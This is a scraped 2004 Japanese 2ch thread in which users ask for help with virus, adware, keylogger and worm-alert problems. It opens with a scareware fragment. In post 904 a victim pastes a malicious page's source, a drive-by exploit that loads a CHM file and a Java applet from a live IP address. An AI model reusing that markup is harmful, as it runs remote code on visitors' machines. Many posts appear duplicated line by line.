retrieved by criminals all around the world. This is a very scary
problem that needs immediate attention! You NEED to get this fixed now!
Click on THIS LINK FOR IMMEDIATE HELP and your computer will be
back to normal and secure again in just a few minutes.
834 :名無しさん@お腹いっぱい。:04/09/29 22:12:06
>ある理由で興奮&焦ってた
またロリか
またロリか
835 :名無しさん@お腹いっぱい。:04/09/29 22:14:54
836 :名無しさん@お腹いっぱい。:04/09/29 22:17:24
>827
まずは>86の通りに書け
話はそれからだ
まずは>86の通りに書け
話はそれからだ
837 :名無しさん@お腹いっぱい。:04/09/29 22:19:31
>>835
えー、直リンにしてないからいいと思ったんだけどな・・・。
えー、直リンにしてないからいいと思ったんだけどな・・・。
839 :名無しさん@お腹いっぱい。:04/09/29 22:22:46
h 抜いても2chブラウザ使ってる人には直リンと何も変わらないんだが・・・
840 :名無しさん@お腹いっぱい。:04/09/29 22:24:28
842 :名無しさん@お腹いっぱい。:04/09/29 22:31:21
>>841
俺は直リンでないに一票を投じることにしよう
俺は直リンでないに一票を投じることにしよう
843 :名無しさん@お腹いっぱい。:04/09/29 22:31:37
した方が良いんじゃない?
835はちょっとキツク言い過ぎだけど。
835はちょっとキツク言い過ぎだけど。
844 :名無しさん@お腹いっぱい。:04/09/29 22:39:14
直リンとはいわんとは思うがここは鑑定スレじゃないって話じゃなかったか?
845 :名無しさん@お腹いっぱい。:04/09/30 00:09:18
XPホームエディションですが、今日急にウイルスバスターが「DIAL_JAPUP.A」を
何度となくリアルタイム検出するようになりました。
トレンドのHP見てもこのウイルスの情報がありません。
どうやらダイアラーとかいう勝手に回線接続な奴みたいなのですが、
お助けくださいませ。
JPUPD.EXE
WNK**.EXE
とかいうファイル名でよく検出されます。
XPのSP2らしき自動アップデートを今日やったのですが、これが原因?
よろしくお願いします。
何度となくリアルタイム検出するようになりました。
トレンドのHP見てもこのウイルスの情報がありません。
どうやらダイアラーとかいう勝手に回線接続な奴みたいなのですが、
お助けくださいませ。
JPUPD.EXE
WNK**.EXE
とかいうファイル名でよく検出されます。
XPのSP2らしき自動アップデートを今日やったのですが、これが原因?
よろしくお願いします。
846 :名無しさん@お腹いっぱい。:04/09/30 00:50:37
ここ見てると、テンプレも読めないヤシらしかウイルス感染してないのが良くわかる。
847 :名無しさん@お腹いっぱい。:04/09/30 00:58:57
848 :名無しさん@お腹いっぱい。:04/09/30 01:38:34
>>846
なんかマヌーやっちゃってる?俺・・・
>>847
ありがとう、セーフモードスキャン試してみます。
ログは、\Local\settings\Temporary Internet Files\Content.IE5\ の
下位フォルダにJPUPD*.EXEが、
\Local\settings\temp\ にwnk**.exeが検出され、どれもアクセス拒否処理を
行ったとなってます。
なんかマヌーやっちゃってる?俺・・・
>>847
ありがとう、セーフモードスキャン試してみます。
ログは、\Local\settings\Temporary Internet Files\Content.IE5\ の
下位フォルダにJPUPD*.EXEが、
\Local\settings\temp\ にwnk**.exeが検出され、どれもアクセス拒否処理を
行ったとなってます。
849 :名無しさん@お腹いっぱい。:04/09/30 02:22:27
2ちゃんねる見てた時急にメール受信の画面が出てきて、何も操作ができなくなってしまいました。
自分で動かすことができないのに誰かが勝手に動かして受信メールを一個ずつ開いて見られました。
まるでおばけが乗り移ったようでした。なんなんでしょう?
これはウイルスですか?ウイルス対策を何もしていない状態だったので可能性はありますよね。
自分で動かすことができないのに誰かが勝手に動かして受信メールを一個ずつ開いて見られました。
まるでおばけが乗り移ったようでした。なんなんでしょう?
これはウイルスですか?ウイルス対策を何もしていない状態だったので可能性はありますよね。
セーフモードスキャンはなぜかバスターが初期化できないと言ってうまくゆかず。
しかしセーフモードからシステムの復旧ができたことに気付いて、
検索とでウイルス見つけて削除、さらにレジストリエディタで関連データ消して
復旧に成功しました。 ついでに紛れ込んでたのも削除。
乙でした。
しかしセーフモードからシステムの復旧ができたことに気付いて、
検索とでウイルス見つけて削除、さらにレジストリエディタで関連データ消して
復旧に成功しました。 ついでに紛れ込んでたのも削除。
乙でした。
851 :名無しさん@お腹いっぱい。:04/09/30 06:26:03
ネットを開くと、アドレスバーの下に新しく
SearchとCorporation 、Internet 、Rights 、Japan 、C 、Copyright 、Reservedっていうのが出ます。
さらにデスクトップの下部に青っぽいタスクバー2本分の大きさの何かが出てきて、
Make MoneyとかMusic、Casinoって書いてあります。
恐くなってNortonで全スキャンしたんですが、何もありませんでした。
直し方教えてください
SearchとCorporation 、Internet 、Rights 、Japan 、C 、Copyright 、Reservedっていうのが出ます。
さらにデスクトップの下部に青っぽいタスクバー2本分の大きさの何かが出てきて、
Make MoneyとかMusic、Casinoって書いてあります。
恐くなってNortonで全スキャンしたんですが、何もありませんでした。
直し方教えてください
852 :名無しさん@お腹いっぱい。:04/09/30 06:45:56
853 :名無しさん@お腹いっぱい。:04/09/30 06:50:37
ありがd!!!
854 :名無しさん@お腹いっぱい。:04/09/30 07:52:55
市満のオンラインスキャンってもう苺きんたま検出できる?
855 :名無しさん@お腹いっぱい。:04/09/30 09:30:11
>>833
ありがとうございます!
>>834
違います。サッカーのネット中継を早く見たくて「ここで○対○の試合見られるよ」って言うのをつい。
リンクの件はすいませんでした。では、htまで抜けば平気ですか?
以後気をつけます。
ありがとうございます!
>>834
違います。サッカーのネット中継を早く見たくて「ここで○対○の試合見られるよ」って言うのをつい。
リンクの件はすいませんでした。では、htまで抜けば平気ですか?
以後気をつけます。
856 :名無しさん@お腹いっぱい。:04/09/30 09:42:35
オンラインスキャンしたら下記のようなウィルスに感染していたのですが、駆除方法を教えてください。
Virus:Trj/Downloader.GK 駆除不能 C:\Documents and Settings\userID\Local Settings\Temp\THI4A84.tmp\twaintec.cab[polall1t.exe
手動しかないのでしょうか?
その場合、このファイルを手動で消しても問題はないのでしょうか?
Virus:Trj/Downloader.GK 駆除不能 C:\Documents and Settings\userID\Local Settings\Temp\THI4A84.tmp\twaintec.cab[polall1t.exe
手動しかないのでしょうか?
その場合、このファイルを手動で消しても問題はないのでしょうか?
857 :名無しさん@お腹いっぱい。:04/09/30 10:24:07
>>856
http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?lst=sol&idvirus=48242
ココイケ
オンラインスキャンするなら別にパンダでも何でもいいけど
ここに書き込むならシマンテックとかのウイルス名にしてくれ
http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?lst=sol&idvirus=48242
ココイケ
オンラインスキャンするなら別にパンダでも何でもいいけど
ここに書き込むならシマンテックとかのウイルス名にしてくれ
858 :名無しさん@お腹いっぱい。:04/09/30 10:59:30
質問させてください。ウイルスについてですが、例えば苺きんたま
であれば「〜.exe」という形になってますよね?それでそのファイル
を実行した時、見た目的にはどうなるのでしょうか?ダブルクリック
しても何も起こらず「?」と思っているうちに感染しているものなの
ですか?それとも何か解凍しているような動きを見せたり、目的の
(偽装されている)動画なりグラフィックがきちんと見えたりするの
でしょうか?
であれば「〜.exe」という形になってますよね?それでそのファイル
を実行した時、見た目的にはどうなるのでしょうか?ダブルクリック
しても何も起こらず「?」と思っているうちに感染しているものなの
ですか?それとも何か解凍しているような動きを見せたり、目的の
(偽装されている)動画なりグラフィックがきちんと見えたりするの
でしょうか?
859 :名無しさん@お腹いっぱい。:04/09/30 11:03:44
「?」と思っているうちに大抵感染します。
860 :名無しさん@お腹いっぱい。:04/09/30 11:05:42
>858
ものによる
表面上何も起こらない(裏ではきっちり作動している)ものもあるし
偽のエラーダイアログとか出すやつもいる
表向きは普通のアプリケーションで裏で別の動作するのもある
ものによる
表面上何も起こらない(裏ではきっちり作動している)ものもあるし
偽のエラーダイアログとか出すやつもいる
表向きは普通のアプリケーションで裏で別の動作するのもある
862 :名無しさん@お腹いっぱい。:04/09/30 12:09:17
パンダオンラインスキャンしてるけど
先生とBit君は反応なしだったよ
やばそうならC:\WINDOWS\system32\ActiveScanを捨てたらいいのかな
あとはレジストリが変更されてないか心配なんだが…
他の人はどうなってる?
先生とBit君は反応なしだったよ
やばそうならC:\WINDOWS\system32\ActiveScanを捨てたらいいのかな
あとはレジストリが変更されてないか心配なんだが…
他の人はどうなってる?
863 :名無しさん@お腹いっぱい。:04/09/30 14:48:02
XPだけど最初のログイン画面でログインすると一瞬壁紙が写って自動的にログアウトしてしまいます。
ノートン入ってますし、別に異常はありませんでした。
お助けお願いします。
ノートン入ってますし、別に異常はありませんでした。
お助けお願いします。
864 :名無しさん@お腹いっぱい。:04/09/30 14:51:25
ageますね
865 :名無しさん@お腹いっぱい。:04/09/30 15:57:30
>>863
う〜んそれはウイルス情報&質問スレに書く内容なのか?
最初のログイン画面というのもそれはXPユーザーのログインログオフのことか?
もう少し質問の仕方を勉強してからここで聞くといいよ。
↓
http://pc5.2ch.net/test/read.cgi/win/1096280267/
もしウイルスに心当たりがあるならばまずはスキャンしろ。
心当たりがないならまずはhttp://www.google.com/intl/ja/ここで探せ。グーグル大先生で8割がたはなんとかなるだろ
ほんと質問する側はそんな質問の仕方で答えてくれると思って聞いているのだろうか・・・・・
何も自分で調べず。どのスレに書き込めばいいかも考えず。自分のPC環境も示さず。
百歩譲ってスパイウェアとの違いがわからないのは許そう
だが俺たちは誘導部隊じゃねぇーんだよ。
ウイルスの字が見えないのかね
^^^^^^^^
う〜んそれはウイルス情報&質問スレに書く内容なのか?
最初のログイン画面というのもそれはXPユーザーのログインログオフのことか?
もう少し質問の仕方を勉強してからここで聞くといいよ。
↓
http://pc5.2ch.net/test/read.cgi/win/1096280267/
もしウイルスに心当たりがあるならばまずはスキャンしろ。
心当たりがないならまずはhttp://www.google.com/intl/ja/ここで探せ。グーグル大先生で8割がたはなんとかなるだろ
ほんと質問する側はそんな質問の仕方で答えてくれると思って聞いているのだろうか・・・・・
何も自分で調べず。どのスレに書き込めばいいかも考えず。自分のPC環境も示さず。
百歩譲ってスパイウェアとの違いがわからないのは許そう
だが俺たちは誘導部隊じゃねぇーんだよ。
ウイルスの字が見えないのかね
^^^^^^^^
866 :名無しさん@お腹いっぱい。:04/09/30 17:18:13
基本的には>>865ハゲドーだけど
初心者は何がわかんないのかすら わかんないってのも事実なんだよね。
だからって許される事ではないけど・・・
って事で質問者はこおテンプレに沿って質問するようにしてチョンマゲ
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
初心者は何がわかんないのかすら わかんないってのも事実なんだよね。
だからって許される事ではないけど・・・
って事で質問者はこおテンプレに沿って質問するようにしてチョンマゲ
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
867 :名無しさん@お腹いっぱい。:04/09/30 17:42:55
>>865-866
やっぱここに集まる奴は何だかんだ言っていい香具師だな。
865は手厳しいけどちゃんと誘導してあげてるし、866はよりやわらかく教えてあげてるしテンプレまでもう一度貼ってくれて。
うんうん。優しいな。そんなお前らが大好きだよ(´Д⊂グスン
やっぱここに集まる奴は何だかんだ言っていい香具師だな。
865は手厳しいけどちゃんと誘導してあげてるし、866はよりやわらかく教えてあげてるしテンプレまでもう一度貼ってくれて。
うんうん。優しいな。そんなお前らが大好きだよ(´Д⊂グスン
868 :名無しさん@お腹いっぱい。:04/09/30 18:05:25
ノートンアンチウイルスが¥1,980
869 :名無しさん@お腹いっぱい。:04/09/30 18:46:06
ストリーミング再生中にウィルスを混入させることは可能ですか?
教えてください。
教えてください。
870 :名無しさん@お腹いっぱい。:04/09/30 19:04:35
初心者です・・助けてください
どうやらウィルスに感染した模様です。
メールに添付されていたファイルを開いたら感染したみたいです。
症状はIEではページが表示できなくなってしまったこととPC起動時の立ち上げに時間がかかるようになったことです。
2chブラウザやヤフーメッセンジャーとかは正常なんです。
最初感染しときに、デスクトップにMS-DOSのショートカット?が作られました。
で、そのショートカットの本体を探したんですが、見当たらず、ウザいのでショートカットは削除しました。
なにかのファイルを埋め込まれたようですが、どうすれば復旧できるでしょうか・・
お願いします
どうやらウィルスに感染した模様です。
メールに添付されていたファイルを開いたら感染したみたいです。
症状はIEではページが表示できなくなってしまったこととPC起動時の立ち上げに時間がかかるようになったことです。
2chブラウザやヤフーメッセンジャーとかは正常なんです。
最初感染しときに、デスクトップにMS-DOSのショートカット?が作られました。
で、そのショートカットの本体を探したんですが、見当たらず、ウザいのでショートカットは削除しました。
なにかのファイルを埋め込まれたようですが、どうすれば復旧できるでしょうか・・
お願いします
871 :名無しさん@お腹いっぱい。:04/09/30 19:07:36
872 :名無しさん@お腹いっぱい。:04/09/30 20:05:25
MS04-011_LSASS_EXPLOIT
MS03-026_RPC_DCOM_EXPLOIT
この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか?
詳しい詳細が解る方、お教えください。
お願いします
MS03-026_RPC_DCOM_EXPLOIT
この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか?
詳しい詳細が解る方、お教えください。
お願いします
873 :872:04/09/30 20:14:30
スミマセン書き直します
【使用OS】 WindowsXP SP2
【WindowsUpdateしてるか】 使用していています
【AntiVirusは何を使っているか】 ウイルスバスター2004
【ちゃんとUpdateしてるか】 自動更新です
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】 大丈夫でした
【症状を具体的に、分かる限りすべて書く】 今のところ被害なし
【何をしたらそんなことになったのか】 ネットに繋げたら頻繁に攻撃してきますが、バスターが
ブロックしてくれます。
【これまでにとった措置】 一応、手動ウイルススキャンしました
【その他の質問】MS04-011_LSASS_EXPLOIT
MS03-026_RPC_DCOM_EXPLOIT
この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか?
詳しい詳細が解る方、お教えください。
お願いします !
どうしたらこの攻撃を回避できるでしょうか?
【使用OS】 WindowsXP SP2
【WindowsUpdateしてるか】 使用していています
【AntiVirusは何を使っているか】 ウイルスバスター2004
【ちゃんとUpdateしてるか】 自動更新です
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】 大丈夫でした
【症状を具体的に、分かる限りすべて書く】 今のところ被害なし
【何をしたらそんなことになったのか】 ネットに繋げたら頻繁に攻撃してきますが、バスターが
ブロックしてくれます。
【これまでにとった措置】 一応、手動ウイルススキャンしました
【その他の質問】MS04-011_LSASS_EXPLOIT
MS03-026_RPC_DCOM_EXPLOIT
この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか?
詳しい詳細が解る方、お教えください。
お願いします !
どうしたらこの攻撃を回避できるでしょうか?
874 :名無しさん@お腹いっぱい。:04/09/30 20:26:30
>>873
バスターのメイン画面→パーソナルファイアーウォール→ネットワークウイルス緊急設定
を見てみ。そこにあるだろう?そこのURLクリックすればトレンドマイクロ
の解説ページに飛ぶから調べてみ。
あと、バスターのパーソナルファイアーウォールを有効にしといてくれ。
設定の仕方は自分で調べてね。
バスターのメイン画面→パーソナルファイアーウォール→ネットワークウイルス緊急設定
を見てみ。そこにあるだろう?そこのURLクリックすればトレンドマイクロ
の解説ページに飛ぶから調べてみ。
あと、バスターのパーソナルファイアーウォールを有効にしといてくれ。
設定の仕方は自分で調べてね。
875 :名無しさん@お腹いっぱい。:04/09/30 20:30:14
876 :名無しさん@お腹いっぱい。:04/09/30 20:34:58
>>873
WindowsUpdateしてるなら気にすることはない。
ネットワーク緊急対策設定→“ネットワーク〜略〜表示する”のチェックをはずす。
チェックをはずしてもPWFが有効ならネットワークウイルスはブロックされているので問題ないよ。
SP2でこの問題が発生してるみたいだね。
WindowsUpdateしてるなら気にすることはない。
ネットワーク緊急対策設定→“ネットワーク〜略〜表示する”のチェックをはずす。
チェックをはずしてもPWFが有効ならネットワークウイルスはブロックされているので問題ないよ。
SP2でこの問題が発生してるみたいだね。
877 :名無しさん@お腹いっぱい。:04/09/30 20:47:10
不具合満載なもんを自動うp立てしてくんなよなぁ
更新の準備ができました
ヽ(`Д´)ノうわーん
更新の準備ができました
ヽ(`Д´)ノうわーん
878 :872:04/09/30 20:57:37
879 :名無しさん@お腹いっぱい。:04/09/30 21:08:54
しかし、「質問テンプレつかって質問しなおしてくれ」って言ってるだけ(のつもり)
なのに、そのまま消えてしまう香具師って、どういうつもりなんだろう・・・?
なのに、そのまま消えてしまう香具師って、どういうつもりなんだろう・・・?
880 :名無しさん@お腹いっぱい。:04/09/30 21:12:39
>>873
ルーターなどを使わずに直接インターネットへつないでいると
世界中からランダムにブラスター系のネットワークウイルスが飛んでくる
それをウイルスバスターのPFWが検出してブロックした報告がそれ。
報告はブロックした後なので、報告を表示しないようにしてもブロックはちゃんと行われる。
ただ、
>どうしたらこの攻撃を回避できるでしょうか?
というのなら、ルーターを買ってきて繋ぐしかないと思う。
ルーターなどを使わずに直接インターネットへつないでいると
世界中からランダムにブラスター系のネットワークウイルスが飛んでくる
それをウイルスバスターのPFWが検出してブロックした報告がそれ。
報告はブロックした後なので、報告を表示しないようにしてもブロックはちゃんと行われる。
ただ、
>どうしたらこの攻撃を回避できるでしょうか?
というのなら、ルーターを買ってきて繋ぐしかないと思う。
881 :名無しさん@お腹いっぱい。:04/09/30 21:26:00
HPがエロサイトになってしまうのですが、
どうしたらよいでしょうか?
お願いいたします。
どうしたらよいでしょうか?
お願いいたします。
882 :名無しさん@お腹いっぱい。:04/09/30 21:29:39
883 :名無しさん@お腹いっぱい。:04/09/30 21:51:37
884 :名無しさん@お腹いっぱい。:04/09/30 21:51:39
>>878
>880さんの書き込みで自分の勘違いに気づきました。
セキュリティパッチ未適用かつ、ポート攻撃がある場合にMS04-011〜等が表示されるものだと
思い込んでいた。
実際はMS04-011〜等の脆弱性を突くウイルスが多数存在する為で、
一例を採ると“MS04-011_LSASS_EXPLOIT”が表示されたときブロックしたウイルスは
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=MS04-011_MICROSOFT_WINDOWS&VSect=T
この内のどれかということでSP2だから表示されるという問題では無かったです。
>880さんの書き込みで自分の勘違いに気づきました。
セキュリティパッチ未適用かつ、ポート攻撃がある場合にMS04-011〜等が表示されるものだと
思い込んでいた。
実際はMS04-011〜等の脆弱性を突くウイルスが多数存在する為で、
一例を採ると“MS04-011_LSASS_EXPLOIT”が表示されたときブロックしたウイルスは
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=MS04-011_MICROSOFT_WINDOWS&VSect=T
この内のどれかということでSP2だから表示されるという問題では無かったです。
886 :名無しさん@お腹いっぱい。:04/09/30 22:01:14
昨日からウイルスと格闘してます。
症状は、タスクマネージャーを見ると
5秒毎にcmd.exeが実行されてます。
ノートンでは検出しない、
レジストリでRUN関係のエントリ削除しまくって
もだめ(勝手にインストールされたserv_Uは
起動しなくなった)、やけくそでcmd.exe削除
してもだめ(削除してもすぐ復活する)。
いいかげんにくじけそうで、なにかちょっとでも
気づくことがあったら教えて頂たいです。
Windows2000でWinアップデートは最新です
症状は、タスクマネージャーを見ると
5秒毎にcmd.exeが実行されてます。
ノートンでは検出しない、
レジストリでRUN関係のエントリ削除しまくって
もだめ(勝手にインストールされたserv_Uは
起動しなくなった)、やけくそでcmd.exe削除
してもだめ(削除してもすぐ復活する)。
いいかげんにくじけそうで、なにかちょっとでも
気づくことがあったら教えて頂たいです。
Windows2000でWinアップデートは最新です
887 :872:04/09/30 22:17:08
>>880>>885両氏
またまた有難う御座います!
>>880さん
取り合えずバスターで様子を見ておきます。
それでも酷い様だとルーターを導入してみます。
>>885さん
SP2だけの問題では無かったのですね。
最近MeからXPにしてSP2にアップロードしましてバスターも入れていたので
安心しきっていました。
でも、昨日まで滅多に攻撃が無かったのに、
今日になってこんなに酷い攻撃の多さなのでちょっとビックリしました。
またまた有難う御座います!
>>880さん
取り合えずバスターで様子を見ておきます。
それでも酷い様だとルーターを導入してみます。
>>885さん
SP2だけの問題では無かったのですね。
最近MeからXPにしてSP2にアップロードしましてバスターも入れていたので
安心しきっていました。
でも、昨日まで滅多に攻撃が無かったのに、
今日になってこんなに酷い攻撃の多さなのでちょっとビックリしました。
888 :名無しさん@お腹いっぱい。:04/09/30 22:30:04
889 :名無しさん@お腹いっぱい。:04/10/01 00:15:18
890 :870:04/10/01 00:29:41
ちょっと席を外しておりました
では失礼をば
【使用OS】win2000
【WindowsUpdateしてるか】してるかどうか忘れました(してないかも)
【AntiVirusは何を使っているか】 ないです・・
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
・強制的にショートカットがデスクトップに作成された(ms-dosなんとかって名前)
・ IEではページが表示できなくなってしまった
・PC起動時の立ち上げに時間がかかるようになった
・2chブラウザやヤフーメッセンジャーとかは正常
【何をしたらそんなことになったのか】 ウィルスメールの添付ファイルを誤って開いてしまった
【これまでにとった措置】強制的に作られたショートカットを削除
【その他の質問】 特になし
おながいしまつ
では失礼をば
【使用OS】win2000
【WindowsUpdateしてるか】してるかどうか忘れました(してないかも)
【AntiVirusは何を使っているか】 ないです・・
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
・強制的にショートカットがデスクトップに作成された(ms-dosなんとかって名前)
・ IEではページが表示できなくなってしまった
・PC起動時の立ち上げに時間がかかるようになった
・2chブラウザやヤフーメッセンジャーとかは正常
【何をしたらそんなことになったのか】 ウィルスメールの添付ファイルを誤って開いてしまった
【これまでにとった措置】強制的に作られたショートカットを削除
【その他の質問】 特になし
おながいしまつ
891 :名無しさん@お腹いっぱい。:04/10/01 00:39:47
C\windows\sysdllディレクトリってウィルスに感染しないとできませんよね?
892 :名無しさん@お腹いっぱい。:04/10/01 00:44:16
>>890
ソースネクストって会社のねぇ、ウイルスセキュリティ2005っていう
とっても安いアンチウイルスソフトがあるんだ。それでねぇ、
この板にもスレが立ってるんだけど、使い続けてる人はみんな
楽しそうで仲がいいんだ。俺使ってないけど、微笑ましくてその
スレは毎日みてるよ。
つーか、まずはオンラインスキャンやってください。
ttp://www.symantec.com/region/jp/securitycheck/index.html
ttp://www.trendmicro.co.jp/hcall/index.asp
ソースネクストって会社のねぇ、ウイルスセキュリティ2005っていう
とっても安いアンチウイルスソフトがあるんだ。それでねぇ、
この板にもスレが立ってるんだけど、使い続けてる人はみんな
楽しそうで仲がいいんだ。俺使ってないけど、微笑ましくてその
スレは毎日みてるよ。
つーか、まずはオンラインスキャンやってください。
ttp://www.symantec.com/region/jp/securitycheck/index.html
ttp://www.trendmicro.co.jp/hcall/index.asp
893 :名無しさん@お腹いっぱい。:04/10/01 00:44:19
>>886
フォーマット
フォーマット
894 :870:04/10/01 00:47:54
>>892
ありがとうございます
オンラインスキャンしたいんですが、ウィルスのためブラウザが使えないんです。
ページが表示されないんです。
2chブラウザとかは使えるので、ネットには接続されているんですが・・
ありがとうございます
オンラインスキャンしたいんですが、ウィルスのためブラウザが使えないんです。
ページが表示されないんです。
2chブラウザとかは使えるので、ネットには接続されているんですが・・
895 :名無しさん@お腹いっぱい。:04/10/01 00:49:27
>>890
セーフモードで起動→オンラインスキャン→手動削除→( ゚Д゚)ウマー だな。
健闘を祈る。
手動削除で自信がなかったらここにまたきなさい。
・怪しいメールはあけない
・アンチウイルスソフトを入れる→無料のもある
セーフモードで起動→オンラインスキャン→手動削除→( ゚Д゚)ウマー だな。
健闘を祈る。
手動削除で自信がなかったらここにまたきなさい。
・怪しいメールはあけない
・アンチウイルスソフトを入れる→無料のもある
896 :名無しさん@お腹いっぱい。:04/10/01 00:50:57
897 :名無しさん@お腹いっぱい。:04/10/01 00:51:25
>>891
うん。download板へ行った方がいいねぇ・・・。
うん。download板へ行った方がいいねぇ・・・。
898 :名無しさん@お腹いっぱい。:04/10/01 01:56:49
ある結婚相談所が作った出会い系サイトのようなものがあって、そこのホームページを見た日だけ必ずといっていいほど非通知でのワン切り電話が掛かって来ます。これはスパイウエアかハッキングのようなものでしょうか?
899 :886:04/10/01 02:01:33
>>888
てめーはマイクロソフトのテクニカルサポートか。
必要な情報は本文中に書いてあるだろボゲェ。
鼻糞以下の脳みその癖にいっちょまえにレスするなや。
>>ヤクザ
手の施しようが無いからフォーマットするよ。。。。
まったく凶悪なウイルス作りやがって
てめーはマイクロソフトのテクニカルサポートか。
必要な情報は本文中に書いてあるだろボゲェ。
鼻糞以下の脳みその癖にいっちょまえにレスするなや。
>>ヤクザ
手の施しようが無いからフォーマットするよ。。。。
まったく凶悪なウイルス作りやがって
900 :名無しさん@お腹いっぱい。:04/10/01 02:11:42
教えてください。アップデートしたXP使っているのですが、
ちょくちょくキーロガーのログファイル(?)がデスクトップ等に現れます。
定義ファイル更新したウィルスバスター2003とspybotでスキャンしても何も見つかりません。
問題のファイルは「}」等の一文字で拡張子もなく、見つけた分だけメモ帳で開いてみると
WINAMPとIEを使用した時のログばかりです。
というか今まさにこのログがデスクトップに現れやがりました。
[02:04:06 10/01/04][ ■2ch BBS .. - Microsoft Internet Explorer]
[http://www2.2ch.net/2ch.html]ではじまり、
半角英数の入力分しか記録してないようです。
全角部分はすべて{left}{up}{right}、あとは{Bkp}{Ent}
なにかアドバイスください・・・
ちょくちょくキーロガーのログファイル(?)がデスクトップ等に現れます。
定義ファイル更新したウィルスバスター2003とspybotでスキャンしても何も見つかりません。
問題のファイルは「}」等の一文字で拡張子もなく、見つけた分だけメモ帳で開いてみると
WINAMPとIEを使用した時のログばかりです。
というか今まさにこのログがデスクトップに現れやがりました。
[02:04:06 10/01/04][ ■2ch BBS .. - Microsoft Internet Explorer]
[http://www2.2ch.net/2ch.html]ではじまり、
半角英数の入力分しか記録してないようです。
全角部分はすべて{left}{up}{right}、あとは{Bkp}{Ent}
なにかアドバイスください・・・
901 :900:04/10/01 02:12:50
青くさせちゃってすいません・・・
902 :名無しさん@お腹いっぱい。:04/10/01 02:51:35
>>898
非通知のワン切りって、なんも意味ないような気がするけどなぁ。
>>900
タスクマネージャーで怪しげなタスクがないか確認してみて。
正常なタスク一覧
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html
ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm
悪いけど寝るわノシ
起きてる回答者の方(いたら)よろしく〜
非通知のワン切りって、なんも意味ないような気がするけどなぁ。
>>900
タスクマネージャーで怪しげなタスクがないか確認してみて。
正常なタスク一覧
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html
ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm
悪いけど寝るわノシ
起きてる回答者の方(いたら)よろしく〜
903 :名無しさん@お腹いっぱい。:04/10/01 03:14:09
904 :名無しさん@お腹いっぱい。:04/10/01 03:19:39
これをあやまって開いてしまったんですが、私のPCはもう感染してしまったのでしょうか。
ソースを表示してみると、へんなJAVAscriptの記述があったり・・・
http://213.159.117.133/dl/ms.php
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'?s-its:mhtml:file://c:\\nosuch.mht!http://213.159.117.133/dl/ms/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderms.jar code=Counter></APPLET></body></html>
ソースを表示してみると、へんなJAVAscriptの記述があったり・・・
http://213.159.117.133/dl/ms.php
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'?s-its:mhtml:file://c:\\nosuch.mht!http://213.159.117.133/dl/ms/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderms.jar code=Counter></APPLET></body></html>
905 :名無しさん@お腹いっぱい。:04/10/01 05:54:59
とあるスレで画像URLをクリックしたら、それはウィルスとスパイウェアを送りつけてくる
悪質なサイトでした・・・
今のとこ被害はないのですが、セキュリティソフト入れてなかったため、多分感染してると思います
パソコンには会社の重要なファイルなどがあるので、消されてしまったりしたらやばいんですけど
まあ、それは自分がセキュリティ管理甘かったってのもありますが
被害が出た場合、こういう悪質なリンクを張る2chネラを刑事告訴なりできるのでしょうか?
それとも、リンク張る奴はいくら張っても何も対処されないままなのでしょうか?
よろしくおねがいします
悪質なサイトでした・・・
今のとこ被害はないのですが、セキュリティソフト入れてなかったため、多分感染してると思います
パソコンには会社の重要なファイルなどがあるので、消されてしまったりしたらやばいんですけど
まあ、それは自分がセキュリティ管理甘かったってのもありますが
被害が出た場合、こういう悪質なリンクを張る2chネラを刑事告訴なりできるのでしょうか?
それとも、リンク張る奴はいくら張っても何も対処されないままなのでしょうか?
よろしくおねがいします
906 :名無しさん@お腹いっぱい。:04/10/01 07:09:22
>>905
罰せられないこともないと思いますが
それは経済的損失がでないともちろんできません。
よっぽどのときは告訴すれば大丈夫です。
けれど2ちゃんねるは「転んでも泣かない」精神が必要なのでまずは対策からしっかりやらないと。
※告訴されるかもしれないからHDDをぶっとばすようなウイルスへのリンクを張る奴はそうそういません。
できれば仕事用のパソコンとネットなどをする用のパソコンで分ければいいと思います。
重要な書類が消えるってのはバックアップとればなんとかなります。
情報を流出する可能性のあるウイルスなどのためにもそうしたほうがいいです。
情報が流出した場合にはあなたに責任が降りかかってくるかもしれませんから。
罰せられないこともないと思いますが
それは経済的損失がでないともちろんできません。
よっぽどのときは告訴すれば大丈夫です。
けれど2ちゃんねるは「転んでも泣かない」精神が必要なのでまずは対策からしっかりやらないと。
※告訴されるかもしれないからHDDをぶっとばすようなウイルスへのリンクを張る奴はそうそういません。
